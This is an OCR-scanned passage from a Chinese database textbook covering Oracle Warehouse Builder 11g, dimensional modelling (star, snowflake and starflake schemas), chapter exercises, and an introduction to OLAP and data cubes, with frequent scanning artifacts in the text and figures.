接口 完成 那些 重复 性 的 维护 工作 。 例 如 ， 每 过 一 定 间 隔 就 要 调度 的 事实 表 刷 新 任务 。 对 于 更 
复杂 的 任务 ，OWB 将 结合 Oracle Workflow 来 完成 。 

元 数据 集成 

OWB 是 基于 通用 数据 仓库 模型 (CWM) 标准 的 (参见 31.3.3 节 )。 它 能 与 Oracle Express、 

Oracle Discoverer 和 其 他 一 些 遵 从 这 一 标准 的 商务 智能 工具 无 缝 交换 元 数据 。 


32.7.3” ”Oracle 11g 中 的 Warehouse Builder 特性 


Oracle Warehouse Builder ( OWB) 11g 除了 其 他 特性 外 ， 还 具有 重要 的 数据 质量 、 集 成 
和 管理 功能 ， 为 开发 人 员 提 供 一 个 易于 使 用 的 工具 ， 能 用 于 快速 设计 、 部 署 和 管理 数据 集成 
项 目 和 BI 系统 。 下 面 是 与 OWB 11g 相关 的 主要 特性 的 示例 。 

@ 数据 概要 分 析 ( data profiling)。Warehouse Builder 提供 了 一 个 数据 分 析 和 纠 错 解 决 
方案 。 数 据 分 析 意 味 着 可 在 创建 一 个 数据 仓库 或 BI 应 用 之 前 和 过 程 中 ， 发 现 和 评测 
数据 中 的 缺陷 。 

@ 关系 型 和 维度 数据 (relational and dimensional data) 对 象 设 计 器 。Warehouse Builder 
引入 了 一 个 新 的 数据 对 象 编辑 器 ， 用 于 创建 、 编 辑 和 配置 关系 型 和 维度 数据 对 象 。 

@ 完成 缓慢 变化 的 维度 ( 工 、 开 和 亚 型 ) 支持 。 仓 库 生 成 器 支持 那些 在 数据 仓库 中 存储 
和 管理 当前 和 历史 数据 的 缓慢 变化 维度 。 
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e Oracle OLAP 集成 。Warehouse Builder 在 建 模 和 直接 维护 方面 扩展 了 对 Oracle OLAP 

的 支持 ， 主 要 利用 一 些 新 的 OLAP 特性 ， 例 如 压缩 立方 体 和 分 区 等 。 

可 传输 模块 (transportable module)。Warehouse Builder 使 得 大 量 数据 可 从 远程 Oracle 

数据 库 提取 。 

e 可 插入 映射 (pluggable mapping)。Warehouse Builder 在 设计 映射 时 节省 了 时 间 和 人 力 ， 

因为 这 个 新 功能 允许 重用 映射 的 数据 流 。 

预定 义 调度 (built-in scheduling)。Warehouse Builder 能 定义 调度 和 可 执行 对 象 与 调 

度 的 关联 。 

@ 复杂 的 沿革 和 影响 分 析 (sophisticated lineage and impact analysis)。 此 功能 增强 了 显示 

在 单个 属性 级 的 影响 和 沿革 ， 通 过 利用 映射 ， 生成 最 坏 情况 的 场景 图 ， 包 括 在 OWB 

之 外 创建 的 用 户 自 定义 对 象 。 

商务 智能 对 象 导 出 。Warehouse Builder 使 用 户 能 派生 和 定义 BI 这 样 的 对 象 ， 它 们 与 

Oracle 的 商务 智能 工具 (例如 Discoverer 和 BI Beans) 集成 在 一 起 。 

Experts。Experts 是 为 了 帮助 高 级 用 户 设计 的 解决 方案 ， 它 们 能 简化 例 程 和 最 终 用 户 

将 在 Warehouse Builder 上 执行 的 复杂 任务 。 

用 户 自 定义 的 对 象 和 图 标 。Warehouse Builder 现在 提供 对 用 户 自 定 义 类 型 的 支持 ， 包 括 

对 象 、 数 组 和 髓 套 表 。 这 使 得 用 户 能 使 用 更 精致 的 数据 存储 和 事务 格式 ， 比 如 那些 用 

于 支持 实时 数据 仓库 的 内 容 。 

® ERP 集成 。Warehouse Builder 在 ERP 集成 方面 提供 了 新 功能 。Oracle 电子 商务 套件 
和 PeopleSoft ERP 的 连接 器 已 经 添加 到 产品 中 。 

e 安全 管理 。Warehouse Builder 使 用 户 能 在 不 使 用 元 数据 安全 控制 与 定义 并 定制 元 数 
据 安全 策略 之 间 进 行 选 择 。 可 以 定义 多 个 用 户 ， 他 们 可 应 用 完全 安全 策略 或 基于 
Warehouse Builder 安全 性 接口 实现 一 个 定制 的 安全 策略 。 

e 各 种 变化 。 包 括 简化 的 安装 和 设置 、 统 一 元 数据 浏览 器 环境 以 及 OMB 扩展 和 认证 。 

有 关 Oracle EDW 的 更 多 详细 信息 可 在 http:Wwww.oracle.com 找到 。 


本 章 小 结 


关于 企业 数据 仓库 (EDW) 的 开发 有 两 种 主要 的 方法 学 ， 它 们 是 由 数据 仓库 领域 的 两 个 关键 人 物 提 
出 的 : Kimball 的 业务 维度 生命 周期 ( Business Dimensional Lifecycle) ( Kimball，2008 ) 和 Inmon 
的 企业 信息 工厂 (Corporate Information Factory ，CIF ) 方法 (Inmon，2001 ) 。 

与 Kimball 的 业务 维度 生命 周期 相关 联 的 指导 性 原则 是 ， 通 过 建设 一 个 单一 、 集 成 、 易 于 使 用 、 高 
性 能 的 信息 基础 设施 来 满足 企业 的 信息 需求 ， 该 基础 设施 应 在 6 个 月 至 12 个 月 的 时 间 范 围 内 增 量 
式 交 付 。 

维度 建 模 ( dimensionality modeling) 是 一 种 设计 技术 ， 其 目标 是 把 数据 表示 成 一 种 标准 、 直 观 的 形 
式 ， 以 支持 高 效 的 数据 访问 。 

每 一 个 维度 模型 ( Dimensional Model ，DM) 都 由 一 个 带 有 组 合 主 关 键 字 、 称 为 事实 表 ( fact table) 
的 表 和 一 系列 较 小 的 、 称 为 维 表 ( dimension table) 的 表 组 成 。 每 一 个 维 表 有 一 个 简单 ( 非 组 合 ) 主 
关键 字 ， 它 与 事实 表 的 组 合 主 关键 字 中 的 一 项 确切 对 应 。 换 句 话 说， 事实 表 的 主 关键 字 由 两 个 或 多 
个 外 部 关键 字 组 成 。 这 种 “ 星 形 ”结构 也 称 为 星 形 模式 (star schema ) 或 星 形 连接 (star join )。 

星 形 模式 (star schema) 是 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周 围 是 非 规范 的 维 表 。 


384 淄 九 部 分 商 姑 和 知 能 


e 星 形 模式 利用 了 事实 性 数据 ( factual data) 的 特性 ， 即 事实 数据 是 由 过 去 发 生 的 事件 产生 的 。 不 管 
用 什么 样 的 方法 进行 分 析 ， 这 些 数据 一 般 不 会 改变 。 由 于 事实 数据 占 数据 仓库 的 数据 总 量 的 大 多 
数 ， 因 此 事实 表 相 对 于 维 表 来 讲 要 大 得 多 。 

e 事实 表 中 最 有 用 的 事实 是 数值 型 和 可 累加 的 。 因 为 数据 仓库 应 用 几乎 从 不 访问 单个 记录 ， 而 是 同时 
访问 成 百 上 千 甚 至 上 百 万 个 记录 。 而 处 理 如 此 多 记录 的 最 有 用 的 方法 就 是 对 它们 进行 聚集 。 

e 维 表 (dimension table) 中 一 般 包含 的 是 一 些 描述 性 的 文本 信息 。 维 度 属 性 用 作 数 据 仓 库 查 询 时 的 约 
束 条 件 。 

e@ 雪花 模式 (snowflake schema) 是 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周 围 是 规范 的 维 表 。 

e 星座 模式 (starflake schema) 是 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周 围 是 规范 和 非 规范 的 维 表 。 

e 理解 DM 与 ER 模型 之 间 联 系 的 关键 是 ， 一 个 ER 模型 通常 会 分 解 成 多 个 DM， 多 个 DM 又 通过 符 
合 的 (共享 的 ) 维 表 关联 到 一 起 。 

@ Kimball 的 业务 维度 生命 周期 的 维度 建 模 阶段 或 创建 用 于 某 个 数据 集 市 的 维度 模型 ， 或 “维度 化 ” 
某 个 OLTP 数据 库 的 关系 模式 。 

@ Kimball 的 业务 维度 生命 周期 的 维度 建 模 阶段 首先 定义 一 个 高 层 DM， 逐 渐 丰 富 更 多 的 细节 。 这 通 
过 两 个 阶段 方法 实现 ， 第 一 阶段 是 创建 高 层 DM (维度 建 模 )， 第 二 阶段 通过 识别 模型 的 维度 属性 向 
模型 添加 细节 。 

e 维度 建 模 阶段 的 第 一 阶段 使 用 四 步 过 程 法 来 促进 DM 的 创建 。 四 步 包括 : 选择 业务 流程 、 声 明 粒 
度 、 选 择 维度 和 识别 事实 。 

e Oracle Warehouse Builder (OWB) 是 Oracle 数据 仓库 解决 方案 的 关键 组 件 ， 使 用 它 能 设计 和 配置 
数据 仓库 、 数 据 集 市 和 电子 商务 智能 应 用 程序 。OWB 也 是 一 个 设计 工具 ， 也 是 一 个 提取 、 变 换 和 
加 载 (ETL) 工具 。 


思考 题 


32.1 讨论 与 启动 一 个 企业 数据 仓库 (EDW) 项 目 相 关 的 活动 。 

32.2 ”对 比 和 比较 采用 Inmon 的 企业 信息 工厂 (CIF) 和 Kimball 的 业务 维度 生命 周期 开发 一 个 EDW 的 方法 。 
32.3 ”讨论 与 Kimball 的 业务 维度 生命 周期 相关 的 主要 原则 和 阶段 。 

32.4 ”讨论 与 维度 建 模 相 关 的 概念 。 

32.5 ”描述 星 形 、 雪 花 和 星座 模型 的 差异 。 

32.6 讨论 在 Kimball 的 业务 维度 生命 周期 的 DM 阶段 中 使 用 的 分 阶段 方法 。 

32.7 ”确定 在 Kimball 的 业务 维度 生命 周期 的 DM 阶段 的 第 一 阶段 中 使 用 的 步骤 。 

32.8 ”确定 与 开发 企业 数据 仓库 相关 的 特定 问题 。 

32.9 ”描述 Oracle Warehouse Builder 如 何 支持 数据 仓库 的 设计 。 


习题 

请 注意 ， 下 列 所 有 习题 均 涉 及 图 32-2 所 示 DM。 

32.10 指出 这 个 DM 能 支持 的 有 关 房 产销 售 的 三 类 分 析 。 
32.11 指出 这 个 DM 不 能 支持 的 有 关 房 产销 售 的 三 类 分 析 。 
32.12 ”讨论 如 何 修改 该 DM 以 支持 练习 32.11 中 给 出 的 查询 。 
32.13 ”在 房产 销售 DM 中 显示 的 事实 表 的 粒度 是 多 少 ? 
32.14 ”在 房产 销售 DM 中 显示 的 事实 表 和 维 表 的 用 途 是 什么 ? 


32:15 
32.16 


S21 


32.18 


32.19 
32.20 


32.2] 
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指出 事实 表 中 派生 属性 的 一 个 示例 ， 并 描述 如 何 计算 它 。 你 有 没有 其 他 建议 ? 

指出 在 该 房产 销售 DM 中 自然 关键 字 和 代理 关键 字 的 两 个 示例 ， 并 讨论 一 般 使 用 代理 关键 字 的 

好 处 。 : 

指出 在 该 房产 销售 DM 中 两 个 可 能 的 SCD 的 例子 ， 并 讨论 每 一 个 表示 的 变化 的 类 型 (类 型 1 

或 类 型 2 ) 。 

确定 使 房产 销售 DM 成 为 一 个 星 形 模式 而 不 是 雪花 模式 的 维度 。 

从 该 DM 中 选择 一 个 维度 ， 以 演示 如 何 将 该 DM 更 改 为 雪花 模式 。 

检查 图 32-12 所 示 的 大 学 的 总 线 矩 阵 。 大 学 按 学 院 组 织 ， 如 计算 机 学 院 、 商 学 院 ， 每 个 学 院 都 

有 一 系列 的 课程 和 模块 。 学 生 向 大 学 申请 修 课程 ， 但 不 是 所 有 申请 都 能 成 功 。 成 功 的 申请 者 注 

册 大 学 课程 ， 课 程 每 学 年 由 六 个 模块 组 成 。 学 生 在 各 模块 开设 班 出 勤 的 情况 以 及 每 个 模块 的 考 

试 结果 都 被 监控 。 

(a) 描述 图 32-12 所 示 的 矩阵 表示 什么 。 

(b) 使 用 图 32-12 的 总 线 矩 阵 中 所 示 的 信息 ， 创 建 一 个 初步 的 高 级 维 模型 ， 表 示 那 些 将 形成 该 
大 学 数据 仓库 的 事实 表 和 维度 表 。 

(c) 使 用 图 32-12 中 的 信息 ， 为 学 生 模块 考试 结果 业务 流程 生成 一 个 星 形 模式 的 维 模型 。 根 据 你 
(假设 ) 作为 当前 或 以 前 的 学 生 对 此 业务 流程 的 知识 ， 为 模式 中 的 每 个 维度 表 最 多 添加 五 个 
(可 能 ) 的 属性 。 再 为 你 的 事实 表 最 多 添加 10 个 〈 可 能 ) 的 属性 来 完成 星 形 模式 。 描 述 你 是 
如 何 选择 属性 以 支持 学 生 考试 结果 分 析 的 。 


图 32-12 ”一 所 大 学 的 总 线 矩 阵 


检查 图 32-13 中 显示 的 维 模型 ( 星 形 模式 )。 此 模型 描述 了 某 数 据 库 的 一 部 分 ， 该 数据 库 将 为 一 
家 叫 作 FastCabs 的 出 租车 公司 提供 决策 支持 。 这 家 公司 为 顾客 提供 出 租车 服务 ， 顾客 可 以 通过 
打 电 话 到 本 地 办 事 处 预订 或 通过 公司 的 网 站 在 线 预 订 出 租车 。 
FastCabs 的 所 有 者 希望 分 析 去 年 一 年 出 租车 的 作业 情况 ， 以 便 能 更 好 地 知晓 来 年 如 何 为 公 
司 配备 资源 。 
(a) 提供 使 用 图 32-13 中 的 星 形 模式 可 以 进行 分 析 的 类 型 示例 。 
(b) 提供 使 用 图 32-13 中 的 星 形 模式 不 能 进行 分 析 的 类 型 例子 。 
(c) 描述 为 支持 以 下 分 析 ， 对 图 32-13 中 所 示 的 星 形 模式 必需 进行 的 修改 。( 同 时 考虑 对 提供 数 
据 的 事务 系统 必要 的 可 能 的 改变 。) 
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@ 分 析出 租车 的 作业 情况 ， 以 确定 出 租车 作业 被 取消 的 原因 与 预订 顾客 的 年 龄 之 间 是 否 存 在 关联 。 


e 根据 在 给 定 的 一 段 时 间 内 ， 司 机 们 为 公司 工作 的 时 间 、 次 数 和 出 租车 作业 的 总 收费 来 分 析出 租车 作 


业 情 况 。 


和 万 部 分 两 大 需 能 


分 析出 租车 的 作业 情况 ， 确 定 预 订 出 租车 最 流行 的 方法 以 及 是 否 有 任何 季节 性 变化 。 
分 析出 租车 的 作业 情况 ， 以 确定 提前 多 入 预订 以 及 是 否 与 作业 的 旅程 有 联系 。 


分 析出 租车 的 作业 情况 ， 以 确定 在 一 年 不 同 的 星期 中 是 否 有 更 多 或 更 少 的 作业 以 及 公共 假期 对 预订 


的 影响 。 


(d) 指出 图 32-13 所 示 的 星 形 模式 中 自然 关键 字 和 代理 关键 字 的 例子 ， 并 讨论 一 般 使 用 代理 关 


(e) 


(Ff) 






jobDescription 

salary 

NIN pos 

oe managerName 
o 







clientID {PK} 
joblD {PK} clientNo 
officelD {FK} fullName 
driverStafflD {FK} Sstreet 
clientiD {FK} city 
vebReglD {F postcode 
pickUpDate {FK} 
pickUpTime {FK} 
pickUpPcode {FK} 
dropOffPcode {FK} 
noJobReason {FK} 
mileage 





























vebReglD {PK} 
vebRegNo 
model 


charge 






time {PK} 
24hourclock 
am/pm indicator 
daySegment 
shift 












Reason 
noJobReasonlD {PK} 
reasonDescription 


图 32-13 ”FastCabs 出 租车 公司 的 维 模型 ( 星 形 模式 ) 


键 字 的 好 处 。 


使 用 取 自 图 32-13 所 示 维 度 模型 的 例子 ， 描 述 该 模型 为 什么 被 称 为 “ 星 ” 模 式 而 不 是 “星座 ” 


模式 。 


考虑 图 32-13 的 维度 ， 指 出 可 能 受到 缓慢 变化 维度 问题 影响 的 例子 。 针 对 每 个 例子 ， 描 述 


处 理 该 变化 最 有 用 的 方法 是 I 型 、II 型 还 是 1II 型 。 
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OLAP 


本 章 我 们 主要 学 习 : 
联机 分 析 处 理 (OLAP) 的 用 途 
OLAP 与 数据 仓库 的 关系 
OLAP 应 用 的 关键 特征 
如 何 表示 多 维 数据 
OLAP 工具 的 准则 
OLAP 工具 的 主要 分 类 
对 SQL 标准 的 OLAP 扩展 
Oracle 怎样 支持 OLAP 


第 31 章 介绍 了 数据 仓库 技术 ， 这 已 日 渐 成 为 企业 获得 竞争 优势 的 常用 方法 。 众 所 周知 ， 
数据 仓库 将 大 量 的 数据 组 织 在 一 起 用 于 数据 分 析 。 然 而 ， 伴 随 着 数据 仓库 的 增长 ， 用 户 对 强 
有 力 分 析 工 具 的 需求 也 随 之 增加 ， 它 们 应 能 提供 高 级 的 分 析 能 力 。 目 前 主要 有 两 类 能 满足 这 
种 需求 的 访问 工具 ， 那 就 是 联机 分 析 处 理 ( OLAP) 和 数据 挖掘 工具 。 这 两 类 工具 给 用 户 提 
供 的 分 析 功 能 有 所 不 同 ， 因 此 它们 是 互补 的 技术 。 

数据 仓库 (或 更 一 般 的 一 或 多 个 数据 集 市 ) 若 集成 了 OLAP 或 数据 挖掘 类 的 工具 ， 则 被 
统称 为 商务 智能 (BI) 技术 。 本 章 将 介绍 OLAP 技术 ， 下 一 章 介 绍 数据 挖掘 技术 。 


| 本 章 结构 

33.1 节 介 绍 什 么 是 联机 分 析 处 理 (OLAP) 以 及 OLAP 与 数据 仓库 技术 的 关系 。33.2 节 
介绍 OLAP 应 用 并 指出 OLAP 应 用 的 关键 特性 。33.3 节 讨 论 如 何 表示 多 维 数据 并 描述 数据 
立方 体 的 主要 概念 。33.4 节 讨 论 OLAP 工具 的 主要 准则 ， 强 调 OLAP 工具 的 特性 和 问题 。 
33.5 节 讨 论 SQL 标准 如 何 被 扩展 以 支持 OLAP 功能 。 最 后 ，33.6 节 描 述 Oracle 如 何 支持 
OLAP。 本 章 中 的 示例 取 自 在 11.4 节 和 附录 A 描述 的 DreamHome 案例 研究 。 


33.1 联机 分 析 处 理 


在 过 去 的 几 十 年 里 ， 关 系 型 DBMS 一 直 非 常 盛行 ， 目 前 有 巨 量 的 企业 数据 存储 在 这 
种 系统 里 。 关 系数 据 库 主要 用 于 支持 传统 的 联机 事务 处 理 ( Online Transaction Processing， 
OLTP) 系统 。 为 了 较 好 地 支持 OLTP 系统 ， 开 发 关系 DBMS 时 主要 关注 如 何 能 高 效 执行 大 
量 但 相对 简单 的 事务 。 

这 几 年 ,关系 DBMS 供应 商 开 始 将 目光 转移 到 数据 仓库 技术 市 场 上 ， 并 声称 可 用 他 们 
的 系统 构建 数据 仓库 。 正 如 第 31 章 讨论 过 的 ， 数 据 仓 库 中 存储 数据 ， 期 望 能 提供 从 相对 简 
单 到 相对 复杂 的 宽泛 的 查询 。 然 而 ， 回 答 特 殊 查 询 的 能 力 依赖 于 在 数据 仓库 上 可 用 的 访问 工 
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具 的 类 型 。 通 用 的 报表 或 查询 工具 能 容易 地 回答 “ 谁 ”或 “什么 ”一 类 的 问题 。 例 如 ,，“2013 
年 第 三 季度 苏格兰 地 区 的 总 收入 是 多 少 ?” 除 了 回答 这 类 问题 ， 本 章 描 述 的 联机 分 析 处 理 
(OLAP) 工具 ， 也 可 以 回答 “为 什么 ”类 型 的 问题 。 例 如 , “为 什么 苏格兰 2013 年 第 三 季度 
的 总 收入 高 于 2013 年 其 他 季度 的 ?” 和 “为 什么 苏格兰 在 2013 年 第 三 季度 的 总 收入 高 于 前 
三 年 同一 季度 的 ?” 


| 联机 分 析 处 理 (OLAP) | 大 量 多 维 数据 的 动态 综合 、 分 析 和 合并 。 


OLAP 使 用 聚集 数据 的 多 维 视图 ， 为 高 级 分 析 提 供 对 信息 的 快速 访问 (Codd 等 人 ， 
1995 )。OLAP 通过 快速 、 一 致 、 交 互 式 地 访问 尽 可 能 多 的 各 种 各 样 的 数据 视图 ， 使 用 户 对 
企业 数据 的 各 个 方面 获得 更 深入 的 了 解 和 知识 。OLAP 人 允许 用 户 以 反映 企业 真实 维度 的 更 
好 的 模型 来 观察 企业 数据 。 虽 然 OLAP 系统 也 能 轻易 地 回答 “ 谁 ”和 “什么 ”之 类 的 问题 ， 
但 它 还 能 回答 “为 什么 ”这 类 问题 ， 这 才 是 它们 区 别 于 一 般 用 途 查询 工具 的 地 方 。 典 型 的 
OLAP 计算 可 能 比 简单 的 聚集 数据 更 复杂 ， 例 如 ,“ 对 比 2010 年 以 来 英格兰 不 同 地 区 各 类 房 
产 每 年 的 销售 情况 。” 因 此 ，OLAP 适宜 的 分 析 类 型 可 以 从 简单 的 导航 或 浏览 ( 称 为 “切片 
和 切 块 ” ) 到 计算 ， 甚 至 是 更 为 复杂 的 分 析 ， 比 如 时 间 序 列 或 复杂 建 模 等 。 


OLAP 测试 基准 


OLAP 协会 已 经 颁布 了 分 析 处 理 测试 基准 APB-1 ( OLAP Council，1998 )。APB-1 的 目 
标 是 测量 一 个 服务 器 总 体 的 OLAP 性 能 ， 而 不 是 单个 任务 的 性 能 。 为 了 保证 APB-1 与 实际 
的 商业 应 用 相 适 应 ， 在 数据 库 上 执行 的 操作 都 是 最 常见 的 业务 操作 ， 包 括 : 

e 加 载 来 自 内 部 或 外 部 数据 源 的 大 规模 数据 。 

渐 增 性 地 加 载 来 自 运营 系统 的 数据 。 
沿 着 层次 结构 聚集 输入 层 数据 。 
基于 业务 模型 计算 新 的 数据 。 

时 间 序 列 分 析 。 

高 复杂 度 的 查询 。 

沿 层次 结构 下 钻 。 

即席 查询 。 

多 个 在 线 会 话 。 

OLAP 应 用 也 是 根据 其 提供 JIT (Just-In-Time) 信息 的 能 力 来 评估 ， 这 种 能 力 是 提供 高 
效 决策 支持 的 核心 需要 。 评 估 一 个 服务 器 满足 需要 的 能 力 ， 不 仅仅 是 衡量 它 的 处 理性 能 ， 还 
有 评估 它 对 复杂 业务 关系 进行 建 模 以 及 响应 业务 需求 变化 的 能 力 。 

为 了 进行 不 同 软 硬 件 组 合 的 性 能 比较 ， 定义 了 一 个 称 为 每 分 钟 分 析 查 询 ( Analytical 
Queries per Minute，AQM) 的 标准 测试 基准 。AQM 表示 每 分 钟 处 理 的 查询 分 析 的 数目 ， 包 
括 数 据 加 载 和 计算 的 时 间 。 因 此 ， 它 将 加 载 性 能 、 计 算 性 能 和 查询 性 能 合并 在 一 个 度量 中 。 

APB-1 基准 测试 结果 的 发 布 必须 包含 数据 库 模 式 和 所 有 执行 这 个 基准 所 需 的 代码 。 这 使 
得 既 可 以 定性 又 可 以 定量 地 评估 一 个 给 定 的 解决 方案 对 所 需 完 成 的 任务 的 合适 程度 。 


33.2 ”OLAP 应 用 
在 很 多 不 同 功能 域 都 存在 OLAP 应 用 的 示例 ， 如 表 33-1 所 示 (OLAP Council，2001 )。 
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表 33-1 在 不 同 功能 域 中 OLAP 应 用 的 示例 


功 能 域 OLAP 应 用 的 示例 
金融 预算 、 基 于 活动 的 成 本 分 析 、 金 融 性 能 分 析 、 人 金融 建 模 
销售 销售 分 析 和 销售 预测 
市 场 市 场 研 究 分 析 、 市 场 预测 、 拓 展 分 析 、 顾 客 分 析 及 市 场 /顾客 分 段 
制造 产品 规划 和 缺陷 分 析 


所 有 OLAP 应 用 的 一 个 基本 需求 就 是 能 为 用 户 提供 对 企业 的 发 展 进行 有 效 决策 所 必需 
的 信息 。 信 息 是 计算 过 的 数据 ， 它 通常 反映 复杂 的 联系 ， 并 能 实时 计算 得 到 。 只 有 响应 时 
间 总 是 很 短 时 ， 分 析 和 建 模 复 杂 联 系 的 功能 才 有 实用 性 。 此 外 ， 由 于 数据 之 间 的 联系 无 法 
预知 ， 定 义 的 数据 模型 必须 足够 灵活 。 真 正 灵活 的 数据 模型 才能 保证 OLAP 系统 像 有 效 决 
策 支 持 要 求 的 那样 ， 能 对 业务 需求 的 变化 做 出 响应 。 虽 然 OLAP 的 应 用 在 广泛 不 同 的 功能 
域 都 能 找到 ， 但 它们 都 需要 具备 以 下 的 关键 特性 ， 这 些 特 性 在 OLAP Council White Paper 
( 2001 ) 中 有 描述 : 

e 多 维 数据 视图 。 

。 支持 复杂 的 计算 。 

e 时 间 智 能 。 

多 维 数据 视图 

将 企业 数据 表示 为 多 维 视图 的 能 力 是 构建 实用 的 业务 模型 的 核心 需求 。 例 如 ， 在 Dream- 
Home 案例 中 ， 用 户 可 能 需要 查看 房产 销售 数据 ， 如 房产 类 型 、 房 产 所 在 地 、 分 公司 、 个 人 
销售 情况 和 时 间 。 多 维 数据 视图 通过 对 企业 数据 的 灵活 访问 ， 可 以 为 分 析 处 理 提供 一 个 基 
础 。 而 且 ， 提 供 数 据 多 维 视 图 的 基本 数据 库 设计 应 该 公平 对 待 所 有 维度 。 也 就 是 说 ， 数 据 库 
设计 应 该 : 

e 对 在 某 一 维 上 所 能 操作 的 类 型 以 及 这 些 操作 执行 的 速率 没有 影响 。 

e 使 用 户 能 跨 任意 维 在 任 一 聚集 层次 上 以 同样 功能 和 难 易 程度 进行 数据 分 析 。 

e 用 尽 可 能 直观 的 方法 支持 数据 的 所 有 多 维 视图 。 

OLAP 系统 应 尽 可 能 多 地 向 用 户 隐藏 复杂 查询 的 语法 ， 而 且 无 论 复杂 与 否 ， 都 提供 一 致 
的 响应 时 间 。OLAP 协会 的 APB-1 性 能 基准 就 是 通过 提出 不 同 复杂 程度 和 范围 的 查询 ,来 
测试 一 个 服务 器 提供 多 维 数据 视图 的 能 力 。 对 这 些 查询 反应 时 间 是 否 一 臻 也 是 服务 器 是 否 满 
足 该 项 需求 的 一 个 关键 性 指标 。 

支持 复杂 的 计算 

OLAP 软件 必须 提供 一 些 强 有 力 的 计算 方法 ， 比 如 说 由 销售 预测 要 求 的 那些 ， 销 售 预 
测 用 到 像 移动 平均 和 百分比 增长 这 样 的 趋势 算法 。 而 且 ， 实 现 计算 方法 的 机 制 应 该 是 清晰 
的 、 非 过 程 化 的 。 这 使 得 OLAP 用 户 能 够 更 加 高 效 地 以 自满 足 方式 进行 工作 。OLAP 协会 的 
APB-1 性 能 基准 有 选择 性 地 包含 了 计算 的 一 些 代表 ， 既 有 简单 的 (如 预算 计算 ) 也 有 复杂 的 
(如 预测 )。 

时 间 关 系 分 析 

时 间 关 系 分 析 几 乎 是 所 有 分 析 型 应 用 的 关键 特性 ， 因 为 性 能 几乎 都 是 采用 时 间 来 衡量 。 
例如 ， 这 个 月 与 上 个 月 比较 、 这 个 月 与 去 年 同月 比较 。 时 间 层 次 并 不 总 像 其 他 层次 一 样 使 
用 。 例 如 ， 用 户 可 能 需要 查看 五 月 份 的 销售 或 2013 年 前 五 个 月 的 销售 。 诸 如 最 近 一 年 、 同 
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期 比较 这 些 概念 应 该 能 容易 地 在 OLAP 系统 中 定义 。OLAP 协会 的 APB-1 性 能 基准 包含 了 
一 些 如 何在 OLAP 应 用 中 使 用 时 间 的 例子 ， 比 如 计算 三 个 月 的 移动 平均 值 ， 或 通过 对 比 今 
年 与 去 年 的 数据 进行 预测 。 


33.3 ”多 维 数据 模型 


本 节 首 先 考虑 可 用 于 表示 多 维 数据 的 可 选 格 式 ， 特 别 侧 重 于 数据 立方 体 。 然 后 描述 与 数 
据 立 方 体 相 关 的 概念 并 识别 出 数据 立方 体 支 持 的 分 析 操 作 的 类 型 。 结 束 本 节 时 简要 考虑 与 多 
维 数据 的 管理 相关 的 主要 问题 。 


33.3.1 可 选 多 维 数据 表示 


多 维 数据 通常 是 事实 (数值 量度 )， 例 如 房产 销售 收入 数据 ， 以 及 这 些 数据 与 维度 的 关 
联 ， 诸 如 (房产 的 ) 所 在 地 和 (房产 出 售 的 ) 时 间 等 。 我 们 描述 如 何 使 用 可 选 的 格式 ， 包 括 
关系 表 、 和 矩阵 和 数据 立方 体 ， 从 而 最 好 地 表示 多 维 数据 。 

我 们 以 二 维 房 产销 售 收 入 数据 的 表示 为 例 ， 开 始 讨论 如 何 最 好 地 表示 多 维 数据 ， 此 例 中 
二 维 是 所 在 地 和 时 间 。 维 度 通 常 是 层次 化 的 概念 ( 见 33.3.2 节 )， 在 此 例 中 ， 收 入 数据 也 是 
相对 于 每 个 维 的 特定 层次 显示 ， 比 如 所 在 地 维度 按 城 市 显示 ， 时 间 维 度 按 季度 显示 。 房 产销 
售 收入 数据 放 入 三 字段 的 关系 表 (城市 、 和 季度、 收入) 中， 如 图 33-1a 所 示 ， 然 而 ， 该 数据 
放 入 图 33-1b 所 示 的 二 维 矩 阵 更 自然 一 些 

现在 考虑 在 房产 销售 收入 数据 中 加 一 个 称 为 类 型 的 维度 。 此 时 ， 三 维 数据 表示 按 所 在 地 
( 按 市 算 ) 和 时 间 ( 按 季 度 算 ) 销售 每 种 类 型 (以 类 型 ) 的 房产 的 收入 数据 。 为 了 简化 示例 ， 
仅 显 示 了 两 种 类 型 的 房屋 ， 即 “公寓 ”或 “别墅 ” 。 同 样 ， 这 些 数据 可 以 放 人 四 个 字段 的 表 
类型、 城市、 季度 、 收 入 ) 中 ， 如 图 33-1c 所 示 。 然 而 ， 该 数据 放 人 一 个 三 维 数据 立方 体 显 
得 更 自然 ， 如 图 33-1d 所 示 。 销 售 收入 数据 (事实 ) 由 数据 立方 体 的 单元 ( cell) 表示 ， 并 且 
每 个 单元 由 每 一 维 的 值 的 交 指 定 。 例 如 ， 当 类 型 ='Flat'、 城 市 ='Glasgow' 和 季度 ='Q1' 时 ， 
房产 销售 收入 为 15056。 








城市 


Aberdeen | al | 53210 | 
| averaeen | a | so0se | 
WE 





图 33-1 多 维 数据 
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季度 
四 三 维 立方 体 





图 33-1 ( 续 ) 


虽然 一 般 认 为 立方 体 是 三 维 结构 ， 但 在 OLAP 环境 中 的 数据 立方 体 是 一 个 维 结构 。 
这 是 必要 的 ， 数 据 很 容易 就 达到 三 维 以 上 。 例 如 ， 房 产销 售 收入 数据 还 可 以 再 加 一 个 第 四 维 
分 公司 ， 这 样 就 将 销售 收入 数据 与 监管 房产 的 单个 分 公司 关联 起 来 了 。 显 示 四 维 数据 立方 体 
更 困难 ， 然 而 ， 可 表示 为 一 系列 三 维 立 方 体 ， 如 图 33-2 所 示 。 为 了 简化 示例 ， 仅 示 出 三 个 
分 公司 ， 即 分 公司 “B003”“B005” 或 “B007”。 


office = B005” 





quarter 


图 33-2 具有 时 间 (季度 )、 所 在 地 (市 )、 房 屋 类 型 (类 型 ) 和 分 店 (分 公司 ) 四 维 的 房产 
销售 收入 数据 表示 可 显示 为 一 系列 三 维 立方 体 


n 维 数据 的 一 种 可 选 的 表示 是 考虑 将 数据 立方 体 看 作 立 方 体 (cuboid) 的 格 (lattice)。 例 
如 ， 图 33-3 显示 将 具有 时 间 (季度 )、 所 在 地 (市 )、 房 屋 类 型 (类 型 ) 和 分 店 (分 公司 ) 四 
个 维度 的 房产 销售 收入 数据 表示 为 立方 体 的 格 ， 其 中 每 个 立方 体 表 示 给 定 维 的 子 集 。 

本 节 早 些 时 候 ， 我 们 曾 给 出 过 图 33-3 所 示 立 方 体 的 一 些 例子 ， 即 那些 用 阴影 标识 的 区 
